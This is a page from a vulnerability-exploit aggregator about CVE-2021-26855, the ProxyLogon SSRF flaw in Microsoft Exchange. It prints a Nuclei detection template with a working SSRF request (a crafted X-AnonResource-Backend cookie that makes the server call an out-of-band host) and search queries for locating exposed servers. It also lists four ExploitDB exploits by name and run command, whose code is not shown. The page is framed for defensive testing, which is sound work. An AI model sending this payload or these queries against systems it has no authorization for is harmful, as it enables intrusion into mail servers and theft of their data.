Skip to content
Appaloosa Scout
Language selector
fr en

Materialized exploit

CVE-2021-26855

CRITICAL KEV

5 public exploit(s) for this CVE, 1 materialized with their code.

For defensive research only. Only test on systems you own or have written authorization for. Unauthorized access is illegal.
Nuclei critical Verified
Source

Microsoft Exchange Server SSRF Vulnerability

By projectdiscovery

How to test this exploit

The Nuclei template IS the test: an executable detection rule. Install nuclei, then run it against a target you control.

nuclei -id CVE-2021-26855 -u https://your-target

Template yaml

id: CVE-2021-26855

info:
  name: Microsoft Exchange Server SSRF Vulnerability
  author: madrobot
  severity: critical
  description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.
  remediation: Apply the appropriate security update.
  reference:
    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
    - https://proxylogon.com/#timeline
    - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
    - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2021-26855
    cwe-id: CWE-918
    epss-score: 0.99996
    epss-percentile: 0.99989
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:CVE-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev,vkev,vuln

http:
  - raw:
      - |
        GET /owa/auth/x.js HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a0047304502200a42cec7d24dac85b5020977fac5eef729e74a2ab4223078ba2783b053fa35c3022100a1af17eb9da1613806cfa60950bcc013ea5c2e6225cb7d5a2a6cedba8fd4c184:922c64590222798bb761d5b6d8e72950
ExploitDB webapps windows
Source

Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)

By mekhalleh

How to test this exploit

Web exploit. Deploy a vulnerable instance in a lab, serve the script/request against it, and observe the response.

ruby 49895.rb

Code

Content not materialized yet (fetched on the next cycle).

View at source
ExploitDB webapps windows
Source

Microsoft Exchange 2019 - Unauthenticated Email Download

By Gonzalo Villegas

How to test this exploit

Web exploit. Deploy a vulnerable instance in a lab, serve the script/request against it, and observe the response.

python3 49879.py

Code

Content not materialized yet (fetched on the next cycle).

View at source
ExploitDB remote windows
Source

Microsoft Exchange 2019 - Server-Side Request Forgery

By F5

How to test this exploit

Remote exploit. Target an isolated vulnerable instance (VM/lab), never a production system.

python3 49663.py

Code

Content not materialized yet (fetched on the next cycle).

View at source
ExploitDB webapps windows
Source

Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)

By testanull

How to test this exploit

Web exploit. Deploy a vulnerable instance in a lab, serve the script/request against it, and observe the response.

python3 49637.py

Code

Content not materialized yet (fetched on the next cycle).

View at source